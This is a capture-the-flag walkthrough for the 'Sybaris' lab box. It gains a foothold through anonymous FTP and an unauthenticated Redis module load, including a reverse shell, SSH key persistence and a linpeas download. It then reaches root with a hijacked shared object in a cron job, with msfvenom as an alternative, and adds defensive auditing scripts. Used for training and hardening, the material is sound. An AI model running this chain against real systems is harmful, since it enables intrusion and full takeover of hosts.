Sybaris
Exploitation Guide for Sybaris | Proving Grounds
In this walkthrough we exploit common misconfigurations of FTP and Redis to get an initial foothold. Then we exploit a cron job that runs as root, with the help of a writable directory in its LD_LIBRARY_PATH.
┌──(imtodess㉿deathnote)-[~/…/boxes/pg/sybaris/scans]
└─$ nmap -p- -vv -Pn -oN nmapFullPort.txt 192.168.91.93
Nmap scan report for 192.168.91.93
Host is up, received user-set (0.25s latency).
Scanned at 2021-09-06 00:21:44 EDT for 867s
Not shown: 65519 filtered ports
Reason: 65519 no-responses
PORT STATE SERVICE REASON
20/tcp closed ftp-data conn-refused
21/tcp open ftp syn-ack
22/tcp open ssh syn-ack
53/tcp closed domain conn-refused
80/tcp open http syn-ack
6379/tcp open redis syn-ack
10091/tcp closed unknown conn-refused
10092/tcp closed unknown conn-refused
10093/tcp closed unknown conn-refused
10094/tcp closed unknown conn-refused
10095/tcp closed unknown conn-refused
10096/tcp closed unknown conn-refused
10097/tcp closed unknown conn-refused
10098/tcp closed unknown conn-refused
10099/tcp closed unknown conn-refused
10100/tcp closed itap-ddtp conn-refused
Read data files from: /usr/bin/../share/nmap
# Nmap done at Mon Sep 6 00:36:11 2021 -- 1 IP address (1 host up) scanned in 867.42 seconds
┌──(imtodess㉿deathnote)-[~/…/boxes/pg/sybaris/scans]
└─$ nmap $ip -p20,21,22,53,80,6379 -sVC --version-all
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-06 03:43 EDT
Stats: 0:06:28 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 75.00% done; ETC: 03:51 (0:02:09 remaining)
Nmap scan report for 192.168.91.93
Host is up (0.25s latency).
PORT STATE SERVICE VERSION
20/tcp closed ftp-data
21/tcp open ftp vsftpd 3.0.2
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxrwxrwx 2 0 0 23 Sep 06 06:43 pub [NSE: writeable]
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 192.168.49.91
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 3
| vsFTPd 3.0.2 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
| 2048 21:94:de:d3:69:64:a8:4d:a8:f0:b5:0a:ea:bd:02:ad (RSA)
| 256 67:42:45:19:8b:f5:f9:a5:a4:cf:fb:87:48:a2:66:d0 (ECDSA)
|_ 256 f3:e2:29:a3:41:1e:76:1e:b1:b7:46:dc:0b:b9:91:77 (ED25519)
53/tcp closed domain
80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/7.3.22)
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-generator: HTMLy v2.7.5
| http-robots.txt: 11 disallowed entries
| /config/ /system/ /themes/ /vendor/ /cache/
| /changelog.txt /composer.json /composer.lock /composer.phar /search/
|_/admin/
|_http-server-header: Apache/2.4.6 (CentOS) PHP/7.3.22
|_http-title: Sybaris - Just another HTMLy blog
6379/tcp open redis?
Service Info: OS: Unix
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 557.82 seconds
Anonymous login is allowed, so let's check whether we can find anything. Unfortunately the FTP share has nothing in it.
┌──(imtodess㉿deathnote)-[~/…/boxes/pg/sybaris/scans]
└─$ ftp 192.168.91.93 21
Connected to 192.168.91.93.
220 (vsFTPd 3.0.2)
Name (192.168.91.93:imtodess): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> passive
Passive mode on.
ftp> ls
227 Entering Passive Mode (192,168,91,93,39,107).
150 Here comes the directory listing.
drwxrwxrwx 2 0 0 23 Sep 06 06:43 pub
226 Directory send OK.
ftp> cd pub
250 Directory successfully changed.
ftp> ls
227 Entering Passive Mode (192,168,91,93,39,112).
150 Here comes the directory listing.
226 Directory send OK.
Redis requires no authentication, but the database is empty, so there is nothing to pull from it. At least we learn the version: 5.0.9.
# Dirsearch started Mon Sep 6 00:23:34 2021 as: dirsearch.py -u 192.168.91.93 /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e php -t 50 -o /home/kali/oscp/boxes/pg/sybaris/scans/dirsearch.txt
200 2KB http://192.168.91.93:80/COPYRIGHT.txt
200 18KB http://192.168.91.93:80/LICENSE.txt
200 8KB http://192.168.91.93:80/README.md
302 0B http://192.168.91.93:80/admin -> REDIRECTS TO: /login
302 0B http://192.168.91.93:80/admin%20/ -> REDIRECTS TO: /login
302 0B http://192.168.91.93:80/admin/ -> REDIRECTS TO: /login
302 0B http://192.168.91.93:80/admin/?/login -> REDIRECTS TO: /login
302 0B http://192.168.91.93:80/admin/backup/ -> REDIRECTS TO: /login
301 235B http://192.168.91.93:80/cache -> REDIRECTS TO: http://192.168.91.93/cache/
200 9KB http://192.168.91.93:80/composer.lock
200 507B http://192.168.91.93:80/composer.json
301 237B http://192.168.91.93:80/content -> REDIRECTS TO: http://192.168.91.93/content/
200 1KB http://192.168.91.93:80/favicon.ico
200 1KB http://192.168.91.93:80/humans.txt
200 8KB http://192.168.91.93:80/index
301 234B http://192.168.91.93:80/lang -> REDIRECTS TO: http://192.168.91.93/lang/
200 3KB http://192.168.91.93:80/login
200 3KB http://192.168.91.93:80/login/
302 0B http://192.168.91.93:80/logout -> REDIRECTS TO: /login
302 0B http://192.168.91.93:80/logout/ -> REDIRECTS TO: /login
200 1KB http://192.168.91.93:80/robots.txt
200 505B http://192.168.91.93:80/sitemap.xml
301 236B http://192.168.91.93:80/system -> REDIRECTS TO: http://192.168.91.93/system/
301 236B http://192.168.91.93:80/themes -> REDIRECTS TO: http://192.168.91.93/themes/
302 0B http://192.168.91.93:80/upload.php -> REDIRECTS TO: /login/
# Disallow directories
Disallow: /config/
Disallow: /system/
Disallow: /themes/
Disallow: /vendor/
Disallow: /cache/
# Disallow files
Disallow: /changelog.txt
Disallow: /composer.json
Disallow: /composer.lock
Disallow: /composer.phar
# Disallow paths
Disallow: /search/
Disallow: /admin/
# Allow themes
Allow: /themes/*/css/
Allow: /themes/*/images/
Allow: /themes/*/img/
Allow: /themes/*/js/
Allow: /themes/*/fonts/
# Allow content images
Allow: /content/images/*.jpg
Allow: /content/images/*.png
Allow: /content/images/*.gif
We get nowhere through the web. We could try brute-forcing the login panel, but other than that I couldn't find any attack vector.
We will exploit Redis module loading (the RedisModules-ExecuteCommand module) to get the initial foothold. We need to compile the module, upload it to the target machine, and then load and call it through Redis. Since we have anonymous write access to FTP, we will upload it there.
Get the module from here and compile it:
┌──(imtodess㉿deathnote)-[~/…/pg/sybaris/exploit/RedisModules-ExecuteCommand]
└─$ ftp 192.168.91.93 21
Connected to 192.168.91.93.
220 (vsFTPd 3.0.2)
Name (192.168.91.93:imtodess): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> passive
Passive mode on.
553 Could not create file.
ftp> cd pub
250 Directory successfully changed.
ftp> put module.so
local: module.so remote: module.so
227 Entering Passive Mode (192,168,91,93,39,110).
150 Ok to send data.
226 Transfer complete.
47872 bytes sent in 0.25 secs (183.4254 kB/s)
ftp> exit
221 Goodbye.
Now load the module through redis.
┌──(imtodess㉿deathnote)-[~/…/boxes/pg/sybaris/scans]
└─$ redis-cli -h 192.168.91.93
192.168.91.93:6379> module load /var/ftp/pub/module.so
OK
192.168.91.93:6379> system.exec "id"
"uid=1000(pablo) gid=1000(pablo) groups=1000(pablo)\n"
We know the module's path because the default home directory of the anonymous user on vsftpd is /var/ftp.
Source:
We now have command execution. The module also has a built-in reverse shell, so start a netcat listener and execute the following command.
192.168.91.93:6379> system.rev 192.168.49.91 80
We receive a shell with the privileges of user pablo.
┌──(imtodess㉿deathnote)-[~/…/boxes/pg/sybaris/scans]
└─$ nc -nvlp 80
listening on [any] 80 ...
connect to [192.168.49.91] from (UNKNOWN) [192.168.91.93] 57946
whoami
pablo
cd pablo
ls
local.txt
cat local.txt
38f4<Redacted>dc952
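As an added example (not part of this walkthrough), the check a defender would run against the Redis configuration for the two conditions used above: a server reachable from the network without a password, and a MODULE command that any client may call. The directive names are real redis.conf directives; the two sample configs are constructed for this demonstration.

```python
# Constructed sample: the exposure seen on the box, Redis bound to every interface,
# without a password and with the MODULE command left enabled.
WEAK_CONF = """
bind 0.0.0.0
protected-mode yes
port 6379
# requirepass foobared
"""
# Constructed sample: the same server with both findings fixed.
HARDENED_CONF = """
bind 127.0.0.1 ::1
port 6379
requirepass <long-random-secret-placeholder>
rename-command MODULE ""
"""

def parse_conf(text):
    """Map each directive (lower-cased) to the list of argument strings it was given."""
    conf = {}
    for line in text.splitlines():
        line = line.strip()
        if line and not line.startswith("#"):
            key, _, args = line.partition(" ")
            conf.setdefault(key.lower(), []).append(args.strip())
    return conf

def audit_redis_conf(text):
    """Return the list of findings; an empty list means this checklist passes."""
    conf = parse_conf(text)
    findings = []
    bind_tokens = [t.lstrip("-") for v in conf.get("bind", []) for t in v.split()]
    on_all_ifaces = any(t in ("0.0.0.0", "*", "::") for t in bind_tokens)
    # Protected mode only engages when no bind directive is given; an explicit bind 0.0.0.0 bypasses it.
    exposed = on_all_ifaces or ("bind" not in conf and conf.get("protected-mode", ["yes"])[0].lower() != "yes")
    if "requirepass" not in conf and exposed:
        findings.append("reachable from the network without a password")
    renames = [v.split() for v in conf.get("rename-command", [])]
    module_off = any(len(r) == 2 and r[0].upper() == "MODULE" and r[1] == '""' for r in renames) \
        or conf.get("enable-module-command", [""])[0].lower() == "no"  # Redis 7+ directive
    if not module_off:
        findings.append("MODULE command available to any client")
    return findings
```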
Before we try to escalate privileges, let's set up a second way to access the target machine in case we get disconnected and have to run the exploit again.
Since SSH is running on the machine, we just put our public key in ~/.ssh/authorized_keys; then we can log in through SSH with our private key.
Make the .ssh directory and download the public key to the target machine.
mkdir .ssh
cd .ssh
wget http://192.168.49.91:6379/id_rsa.pub
--2021-09-06 02:30:14-- http://192.168.49.91:6379/id_rsa.pub
Connecting to 192.168.49.91:6379... connected.
HTTP request sent, awaiting response... 200 OK
Length: 572 [application/vnd.exstream-package]
Saving to: 'id_rsa.pub'
0K 100% 21.2M=0s
2021-09-06 02:30:15 (21.2 MB/s) - 'id_rsa.pub' saved [572/572]
ls
id_rsa.pub
Rename it to authorized_keys.
mv id_rsa.pub authorized_keys
cat authorized_keys
Now we can login with ssh.
┌──(imtodess㉿deathnote)-[~/…/pg/sybaris/exploit/RedisModules-ExecuteCommand]
└─$ ssh -i ~/.ssh/id_rsa pablo@192.168.91.93
The authenticity of host '192.168.91.93 (192.168.91.93)' can't be established.
ECDSA key fingerprint is SHA256:qzsl2Px3mLCH63nX2cvCIQxE3QbBAZqvIEnarFYfyho.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.91.93' (ECDSA) to the list of known hosts.
[pablo@sybaris ~]$ ls
local.txt
[pablo@sybaris ~]$ which python
/usr/bin/python
Download linpeas onto the target machine.
[pablo@sybaris ~]$ cd /tmp
[pablo@sybaris tmp]$ wget http://192.168.49.91:6379/linpeas.sh
--2021-09-06 02:34:19-- http://192.168.49.91:6379/linpeas.sh
Connecting to 192.168.49.91:6379... connected.
HTTP request sent, awaiting response... 200 OK
Length: 454923 (444K) [text/x-sh]
Saving to: ‘linpeas.sh’
100%[========================================>] 454,923 339KB/s in 1.3s
2021-09-06 02:34:20 (339 KB/s) - ‘linpeas.sh’ saved [454923/454923]
Make it executable and run it.
[pablo@sybaris tmp]$ chmod +x linpeas.sh
[pablo@sybaris tmp]$ ./linpeas.sh
. . .
LD_LIBRARY_PATH=/usr/lib:/usr/lib64:/usr/local/lib/dev:/usr/local/lib/utils
MAILTO=""
* * * * * root /usr/bin/log-sweeper
. . .
From the above result, it seems a cron job runs on the system with root privileges, and its LD_LIBRARY_PATH has extra directories as well. One of them, /usr/local/lib/dev, is writable.
Since we can write to one of these directories, we should be able to inject a malicious shared object to exploit the cron job.
First, list the shared objects of /usr/bin/log-sweeper.
[pablo@sybaris tmp]$ ldd /usr/bin/log-sweeper
linux-vdso.so.1 => (0x00007ffc029ca000)
utils.so => not found
libc.so.6 => /lib64/libc.so.6 (0x00007f99d0518000)
/lib64/ld-linux-x86-64.so.2 (0x00007f99d08e6000)
The shared object named utils.so is not found, so we create our own shared object with that name and add it to the library path.
Compile the following C code as follows:
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
// Constructor: runs as soon as the loader maps this library into the cron job's process.
static void hijack(void) __attribute__((constructor));
static void hijack(void){
setresuid(0,0,0);
system("chmod +s /bin/bash");
}
// compile this exploit with following command
// gcc -o utils.so -shared -fPIC exploit.c
Then upload the compiled shared object to target machine through ftp.
┌──(imtodess㉿deathnote)-[~/…/boxes/pg/sybaris/exploit]
└─$ ftp 192.168.91.93 21
Connected to 192.168.91.93.
220 (vsFTPd 3.0.2)
Name (192.168.91.93:imtodess): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> passive
Passive mode on.
ftp> cd pub
250 Directory successfully changed.
ftp> put utils.so
local: utils.so remote: utils.so
227 Entering Passive Mode (192,168,91,93,39,116).
150 Ok to send data.
226 Transfer complete.
16040 bytes sent in 0.00 secs (188.8511 MB/s)
ftp> ^C
ftp> exit
Move the shared object into the writable path and wait for the cron job to run.
[pablo@sybaris tmp]$ mv /var/ftp/pub/utils.so /usr/local/lib/dev/
After some time the permissions of /bin/bash change (the setuid bit is set). We can then just run bash -p to get root privileges.
[pablo@sybaris tmp]$ ls -la /bin/bash
-rwsr-sr-x. 1 root root 964536 Mar 31 2020 /bin/bash
[pablo@sybaris tmp]$ bash -p
bash-4.2# id
uid=1000(pablo) gid=1000(pablo) euid=0(root) egid=0(root) groups=0(root),1000(pablo)
bash-4.2# whoami
root
bash-4.2# cd /root
bash-4.2# ls
proof.txt
bash-4.2# cat proof.txt
ba233<redacted>02ab20b
If you prefer a reverse shell, create the malicious shared object with msfvenom instead.
msfvenom -p linux/x64/shell_reverse_tcp -f elf-so -o utils.so LHOST=192.168.91.49 LPORT=6379
The remaining steps are the same as above; just remember to start a netcat listener first.
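As an added example (not part of this walkthrough), the check a defender would run for the condition exploited here: a cron job running as root whose LD_LIBRARY_PATH includes a directory that unprivileged users can write to, combined with a shared object ldd cannot resolve. The cron and ldd text are constructed from the lines above, and a directory tree with the box's permissions is built in a temp dir so the permission check runs offline.

```python
import os
import stat
import tempfile

# Constructed sample mirroring the cron entry linpeas reported on the box.
CRON_TEXT = """\
LD_LIBRARY_PATH=/usr/lib:/usr/lib64:/usr/local/lib/dev:/usr/local/lib/utils
MAILTO=""
* * * * * root /usr/bin/log-sweeper
"""
# Constructed sample mirroring `ldd /usr/bin/log-sweeper` on the box.
LDD_TEXT = """\
linux-vdso.so.1 => (0x00007ffc029ca000)
utils.so => not found
libc.so.6 => /lib64/libc.so.6 (0x00007f99d0518000)
"""

def parse_cron(text):
    """Return (LD_LIBRARY_PATH dirs, commands run as root) from a cron.d-style file."""
    ld_dirs, root_jobs = [], []
    for line in text.splitlines():
        if line.startswith("LD_LIBRARY_PATH="):
            ld_dirs = [d for d in line.split("=", 1)[1].strip('"').split(":") if d]
        elif line.strip() and not line.startswith("#") and "=" not in line.split()[0]:
            fields = line.split(None, 6)  # five time fields, user, command
            if len(fields) == 7 and fields[5] == "root":
                root_jobs.append(fields[6])
    return ld_dirs, root_jobs

def missing_libs(ldd_text):
    # Libraries ldd could not resolve: the loader takes the first match found in LD_LIBRARY_PATH.
    return [l.split()[0] for l in ldd_text.splitlines() if "=> not found" in l]

def writable_by_others(path):
    """True if the directory exists and is group- or world-writable."""
    return os.path.isdir(path) and bool(os.stat(path).st_mode & (stat.S_IWGRP | stat.S_IWOTH))

def audit(cron_text, ldd_text, root="/"):
    """Flag root jobs whose LD_LIBRARY_PATH contains a directory others can write to."""
    ld_dirs, jobs = parse_cron(cron_text)
    bad = [d for d in ld_dirs if writable_by_others(os.path.join(root, d.lstrip("/")))]
    return {"root_jobs": jobs, "writable_ld_dirs": bad, "unresolved_libs": missing_libs(ldd_text)}

def build_sample_tree():
    """Constructed directory tree reproducing the box's permissions under a temp dir."""
    root = tempfile.mkdtemp()
    modes = {"usr/lib": 0o755, "usr/lib64": 0o755, "usr/local/lib/dev": 0o777, "usr/local/lib/utils": 0o755}
    for rel, mode in modes.items():
        os.makedirs(os.path.join(root, rel), exist_ok=True)
        os.chmod(os.path.join(root, rel), mode)
    return root
```

Running audit(CRON_TEXT, LDD_TEXT, build_sample_tree()) reports /usr/local/lib/dev as the writable path and utils.so as the unresolved library for the root job /usr/bin/log-sweeper; pointing root at the real filesystem runs the same check on a live host.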